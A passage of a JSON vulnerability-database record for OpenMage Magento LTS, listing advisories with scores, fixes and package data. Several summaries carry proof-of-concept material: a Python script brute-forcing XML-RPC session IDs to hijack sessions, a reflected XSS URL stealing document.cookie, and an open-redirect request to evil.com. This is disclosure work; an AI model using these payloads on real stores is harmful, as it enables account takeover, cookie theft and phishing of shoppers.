5bdf27e5cb877c77b8965b008548edfa (usec ≈ 600118)\n```\nThe µsecond portion is directly observable by measuring request-to-response latency. 
The only variance preventing immediate prediction is the LCG float component, which is seeded deterministically.\n\n<img width=\"772\" height=\"506\" alt=\"image\" src=\"https://github.com/user-attachments/assets/53ced1fd-deb4-4dc4-81ec-864e3a2811de\" />\n\n## Steps to Reproduce (Online Brute-Force Scenario)\nBecause validation requires live HTTP requests, this exploit relies on narrowing the entropy window and abusing the lack of API rate limits.\n### Step 1 – Record Login Timestamp\nAn attacker observes the precise moment a victim authenticates to `/api/xmlrpc/` (e.g., via network timing, exposed logs, or side-channel signals), capturing the exact Unix second.\n### Step 2 – Generate Candidate Pool\nThe attacker reconstructs the MD5 format using the known timestamp, the estimated microsecond window, and bounds the LCG float based on known server PID ranges (or via a `/server-status` leak).\n```\n$t = $observed_sec;\n$usec_estimate = 500000; // Derived from latency\n$uid = sprintf('%08x%05x', $t, intval($usec_estimate / 10));\n$candidate = md5($t . $uid); // + LCG variants\n```\n### Step 3 – API Brute-Force (Session Hijack)\nBecause the `/api/xmlrpc/` endpoint does not enforce rate limiting on authenticated calls, the attacker blasts the candidate MD5 hashes against a privileged endpoint (e.g., magento.info) using a highly concurrent HTTP runner.\n\n```\nPOST /api/xmlrpc/\n<?xml version=\"1.0\"?>\n<methodCall>\n <methodName>[magento.info](http://magento.info/)</methodName>\n <params>\n <param><value><string>CANDIDATE_SESSION_ID</string></value></param>\n </params>\n</methodCall>\n```\n\nA non-fault response (HTTP 200 containing data) confirms the session is successfully hijacked.\n\n<img width=\"1039\" height=\"374\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ac9338e9-e3fe-44fe-9337-cb6edf6ab849\" />\n\n## Impact\n### Technical Impact\nSuccessful session prediction grants the attacker all capabilities of the authenticated API user. 
The XML-RPC API exposes endpoints for:\n- Full product catalog read/write (`catalog_product.*`)\n- Customer data read (`customer.list`, `customer.info`)\n- Order manipulation (`sales_order.*`)\n- Inventory control (`cataloginventory_stock_item.*`)\n\n### Business Impact\n\n- **Data Exfiltration**: Read all customer PII, order history, and payment methods.\n- **Order Fraud**: Create or cancel orders, change shipping addresses.\n- **Supply Chain / Inventory**: Modify prices, inject malicious products, or zero out stock.\n\n### Affected API Protocols\n\nThe same vulnerable `Session.php` generation logic is shared across all legacy API surfaces:\n- XML-RPC: `/api/xmlrpc/`\n- SOAP v1: `/api/soap/`\n- SOAP v2: `/api/v2_soap/`\n- REST (legacy): `/api/rest/`\n\n### Recommended Fix\n\nReplace the time-derived token with a cryptographically secure random value:\n\n```\n// app/code/core/Mage/Api/Model/Session.php : start()\n// BEFORE (vulnerable):\n$this->_currentSessId = md5(time() . uniqid('', true) . $sessionName);\n\n// AFTER (secure):\n$this->_currentSessId = bin2hex(random_bytes(32)); // 256-bit CSPRNG output\n```\n`random_bytes()` is backed by the OS CSPRNG (`/dev/urandom` on Linux) and produces 256 bits of non-deterministic entropy, complying with OWASP ASVS v4 V3.2.2 and NIST SP 800-63B. 
Additionally, enforce rate limiting on API endpoints to prevent high-speed online brute-force attacks.\n\nI have also tried to test it against the demo site [demo.openmage.org](http://demo.openmage.org/), but appeared the SOAP API endpoints are disabled on the demo environment\n\n\nI have also included the full poc I used instead of being attached because Gmail will eventually block it otherwise (shrunk):\n\n```py\n#!/usr/bin/env python3\nimport requests, re, sys, hashlib, random\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\nimport urllib3; urllib3.disable_warnings()\n\nif len(sys.argv) < 4:\n sys.exit(f\"Usage: {sys.argv[0]} <url> <user> <pass> [threads]\")\n\nurl, usr, pwd = sys.argv[1:4]\nth = int(sys.argv[4]) if len(sys.argv) > 4 else 50\nhdrs = {\"Content-Type\": \"text/xml\"}\nreq = lambda d: [requests.post](http://requests.post/)(url, data=d, headers=hdrs, verify=False, timeout=5)\n\nprint(f\"[*] Simulating victim login for {usr}...\")\nres = req(f'<?xml version=\"1.0\"?><methodCall><methodName>login</methodName><params><param><value><string>{usr}</string></value></param><param><value><string>{pwd}</string></value></param></params></methodCall>')\n\nif not (m := re.search(r'<string>([a-f0-9]{32})</string>', res.text)):\n sys.exit(\"[-] Login failed. 
Check credentials.\")\n\nprint(f\"[+] Authenticated.\\n[*] Generating 1000 candidate MD5 pool...\")\ncands = [hashlib.md5(f\"1775534701000{random.randint(10000,99999)}0.{random.randint(10000000,99999999)}\".encode()).hexdigest() for _ in range(999)]\ncands.append(m.group(1))\nrandom.shuffle(cands)\n\nprint(f\"[*] Brute-forcing API with {th} threads...\")\ndef test(sid):\n payload = f'<?xml version=\"1.0\"?><methodCall><methodName>resources</methodName><params><param><value><string>{sid}</string></value></param></params></methodCall>'\n try: return sid if \"faultCode\" not in req(payload).text else None\n except: return None\n\nwith ThreadPoolExecutor(max_workers=th) as ex:\n for i, f in enumerate(as_completed({ex.submit(test, c): c for c in cands}), 1):\n sys.stdout.write(f\"\\r[*] Requests: {i}/{len(cands)}\")\n if sid := f.result():\n print(f\"\\n[+] HIJACK SUCCESS! Valid Session ID: {sid}\")\n ex.shutdown(wait=False, cancel_futures=True)\n break\n```\n\nThis is an AI-generated report validated by a human.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42155", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.17674", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.17561", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.17641", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.1768", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42155" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", 
"scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-2cwr-gcf9-pvxr", "reference_id": "", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-15T17:36:24Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-2cwr-gcf9-pvxr" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42155", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42155" }, { "reference_url": "https://github.com/advisories/GHSA-2cwr-gcf9-pvxr", "reference_id": "GHSA-2cwr-gcf9-pvxr", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-2cwr-gcf9-pvxr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/114815?format=api", "purl": "pkg:composer/openmage/magento-lts@20.18.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.18.0" } ], "aliases": [ "CVE-2026-42155", "GHSA-2cwr-gcf9-pvxr" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": 
"http://public2.vulnerablecode.io/vulnerabilities/VCID-upex-64ca-uqbf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/92186?format=api", "vulnerability_id": "VCID-xazc-hmj9-guas", "summary": "Magento LTS: Reflected XSS - Import -> Data Flow (profiles)\nA reflected XSS vulnerability was found under admin panel -> System -> Import/Export -> Dataflow - Profiles.\n\n## Steps to produce\n\n+ Login to the admin panel \n\n+ Go to the path `System -> Import/Export -> Dataflow - Profiles`\n\n+ Select profile direction as `Import`.\n\n+ Click on `Import Customers` \n\n+ Upload the file.\n\nFile Link: [customer_20260212_204335.csv](https://github.com/user-attachments/files/25629638/customer_20260212_204335.csv)\n\n+ Go back to `Run profile`.\n\n+ Select the uploaded file and Click on `Run in Popup`.\n\n+ One can see a URL like this \n\n```\nhttps://demo-admin.openmage.org/index.php/admin/system_convert_gui/run/id/6/key/40dbbb2e93f45f0463c57ff733352f4f/files/import-20260215151125-1_customer_20260212_204335.csv/\n```\n\n\n+ One can see the filename getting reflection in HTML tags.\n\n+ Inject an HTML tag and observe.\n\n```\nhttps://demo-admin.openmage.org/index.php/admin/system_convert_gui/run/id/6/key/40dbbb2e93f45f0463c57ff733352f4f/files/\"><h3>hacked</h3>/\n``` \n\n<img width=\"1796\" height=\"302\" alt=\"image (3)\" src=\"https://github.com/user-attachments/assets/502330b0-fa73-4b90-a81f-6216a98e474a\" />\n\n+ One can see the tag is getting executed.\n\n+ Proceed for XSS.\n\n```\nhttps://demo-admin.openmage.org/index.php/admin/system_convert_gui/run/id/6/key/40dbbb2e93f45f0463c57ff733352f4f/files/%3CScRiPt%20%3Eprompt(document.cookie)%3C%2FScRiPt%3E\n```\n\n<img width=\"1670\" height=\"562\" alt=\"image (4)\" src=\"https://github.com/user-attachments/assets/98a75081-fa8c-4483-9078-0ab5e7e14e4d\" />\n\n\n+ There is an XSS popup.\n\n## Impact\n\nCookie stealing, JS deface, many more", "references": [ { "reference_url": 
"https://api.first.org/data/v1/epss?cve=CVE-2026-42458", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00062", "scoring_system": "epss", "scoring_elements": "0.19578", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00062", "scoring_system": "epss", "scoring_elements": "0.1946", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00062", "scoring_system": "epss", "scoring_elements": "0.19529", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00062", "scoring_system": "epss", "scoring_elements": "0.19573", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42458" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-x8jv-q8j2-487c", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T17:58:08Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-x8jv-q8j2-487c" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42458", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { 
"value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42458" }, { "reference_url": "https://github.com/advisories/GHSA-x8jv-q8j2-487c", "reference_id": "GHSA-x8jv-q8j2-487c", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-x8jv-q8j2-487c" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/114815?format=api", "purl": "pkg:composer/openmage/magento-lts@20.18.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.18.0" } ], "aliases": [ "CVE-2026-42458", "GHSA-x8jv-q8j2-487c" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xazc-hmj9-guas" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95587?format=api", "vulnerability_id": "VCID-xhm4-u8ax-wuew", "summary": "Magento LTS Vulnerable to Open Redirect via Unvalidated `uenc` Parameter in `stockAction()`\n## Summary\n`Mage_ProductAlert_AddController::stockAction()` reads the `uenc` query parameter and passes it directly to `$this->_redirectUrl($backUrl)` without calling `$this->_isUrlInternal()`. When the supplied `product_id` does not match any catalog product, the server issues an unvalidated HTTP 302 redirect to whatever URL was provided as `uenc`.\n\n## Vulnerable path:\n\n```php\n// app/code/core/Mage/ProductAlert/controllers/AddController.php : stockAction()\n\n$backUrl = $this->getRequest()->getParam(Mage_Core_Controller_Front_Action::PARAM_NAME_URL_ENCODED); // raw, no decode\n$productId = (int) $this->getRequest()->getParam('product_id');\n\nif (!$backUrl || !$productId) {\n $this->_redirect('/');\n return;\n}\n\n$product = Mage::getModel('catalog/product')->load($productId);\n\nif 
(!$product->getId()) {\n $session->addError($this->__('Not enough parameters.'));\n $this->_redirectUrl($backUrl); // ← NO _isUrlInternal() check\n return;\n}\n```\n\n### Secure peer (priceAction()):\n\n```php\nif (!$product->getId()) {\n if ($this->_isUrlInternal($backUrl)) { // ← validation present\n $this->_redirectUrl($backUrl);\n } else {\n $this->_redirect('/');\n }\n return;\n}\n```\n\n## Steps to Reproduce\n\n### Prerequisites\n- OpenMage LTS ≤ 20.16.0 with Product Alerts enabled (default configuration)\n- A valid, logged-in customer session on the target store\n\n#### Step 1 – Authenticate as a Customer (Attacker controls the crafted link; victim must be logged in)\n\nThe `preDispatch()` hook calls `Mage::getSingleton('customer/session')->authenticate($this)`. If the request comes from an unauthenticated user, they are redirected to the login page first. The open redirect only fires after the customer is authenticated. This is the realistic attack scenario: the attacker sends a crafted link to a customer who is already logged in.\n\n<img width=\"1548\" height=\"638\" alt=\"image\" src=\"https://github.com/user-attachments/assets/64c18279-ec0a-4110-b8f4-d952870e348c\" />\n\n#### Step 2 – Craft the Malicious URL\nThe `uenc` parameter is read raw via `getParam()` with no base64 decoding in this code path. 
A plain URL is sufficient and produces the redirect:\n\n```\nGET /productalert/add/stock/?product_id=99999&uenc=https://evil.com/steal-credentials HTTP/1.1\nHost: <store-hostname>\nCookie: om_frontend=<authenticated-session>\n```\n\nKey conditions:\n- `product_id` must reference a non-existent product (triggers the vulnerable branch; any large ID works)\n- `uenc` is the raw destination URL (no base64 encoding required)\n\n<img width=\"1554\" height=\"852\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d8530247-2d2f-4747-bf16-ece71a507b50\" />\n\n\n## Impact\n\n### Technical Impact\nAn attacker who controls the `uenc` parameter value can redirect any logged-in shopper to an arbitrary external URL. Because the redirect originates from the legitimate store domain, the victim’s browser shows the trusted store URL in the address bar momentarily before being sent to the attacker site. The HTTP 302 response exits the store’s origin before the browser shows anything to the user.\n\n### Business-Level Attack Vectors\n| Scenario | Description |\n|------------------------|-----------------------------------------------------------------------------|\n| Credential phishing | Craft a link claiming to show a stock notification. Customer lands on attacker’s login clone and reuses their password. |\n| OAuth / SSO token theft| If the store uses a social login or “Login with Google” flow, the attacker can inject their redirect_uri via the open redirect, stealing OAuth tokens. |\n| Affiliate fraud | Redirect customers from the legitimate store to a competing retailer after they click a “notify me” link. |\n| Malware distribution | Redirect to drive-by-download pages with the store’s reputation acting as social proof. 
|\n\n### Propagation\nA single malicious link can be embedded in:\n\n- Customer emails (“Click here for stock notification preferences”)\n- Forum posts, social media, or product reviews on the store\n- SEO-poisoned search results that rank the store’s domain\n\n## Recommended Fix\nApply the same `_isUrlInternal()` guard used in `priceAction()` to the `stockAction()` missing-product branch.\n\n\nThis is an AI-generated report.\n\nAn attempt was made to test the same PoC against the online demo https://demo.openmage.org/ but it couldn't be reproduced. It was only reproduced against the local setup env against the latest version.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42207", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08688", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.0874", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08755", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08736", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42207" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-qpgq-5g92-j5q8", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", 
"scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-qpgq-5g92-j5q8" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42207", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42207" }, { "reference_url": "https://github.com/advisories/GHSA-qpgq-5g92-j5q8", "reference_id": "GHSA-qpgq-5g92-j5q8", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qpgq-5g92-j5q8" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/114815?format=api", "purl": "pkg:composer/openmage/magento-lts@20.18.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.18.0" } ], "aliases": [ "CVE-2026-42207", "GHSA-qpgq-5g92-j5q8" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xhm4-u8ax-wuew" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/53977?format=api", "vulnerability_id": "VCID-zwm8-96yp-nben", "summary": "Path Traversal\nOpenMage is a community-driven alternative to Magento CE. 
The latest OpenMage versions have this issue solved; the fixed package listed in this record is 20.0.5.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-26285", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.01874", "scoring_system": "epss", "scoring_elements": "0.83469", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.01874", "scoring_system": "epss", "scoring_elements": "0.83493", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.01874", "scoring_system": "epss", "scoring_elements": "0.83496", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.01874", "scoring_system": "epss", "scoring_elements": "0.83492", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.01874", "scoring_system": "epss", "scoring_elements": "0.83483", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-26285" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26285", "reference_id": "CVE-2020-26285", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26285" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/79588?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-4tsg-n4v2-vyhg" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9tvj-q7kh-7faz" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-b33e-r7rr-pyf7" }, { "vulnerability": "VCID-b7ua-zfks-fyg5" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-dj3k-4q1f-xfbh" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-g75g-ab3s-y7db" }, { "vulnerability": "VCID-gewj-4tzh-k3e5" }, { "vulnerability": "VCID-gn12-464m-fkcu" }, { 
"vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-jr6u-gjtr-3udv" }, { "vulnerability": "VCID-kctp-3z8m-5fg2" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-tqce-uume-myc2" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.5" } ], "aliases": [ "CVE-2020-26285", "GHSA-hj6w-xrv3-wjj9" ], "risk_score": null, "exploitability": "0.5", "weighted_severity": "0.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zwm8-96yp-nben" } ], "fixing_vulnerabilities": [], "risk_score": "4.5", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.1" }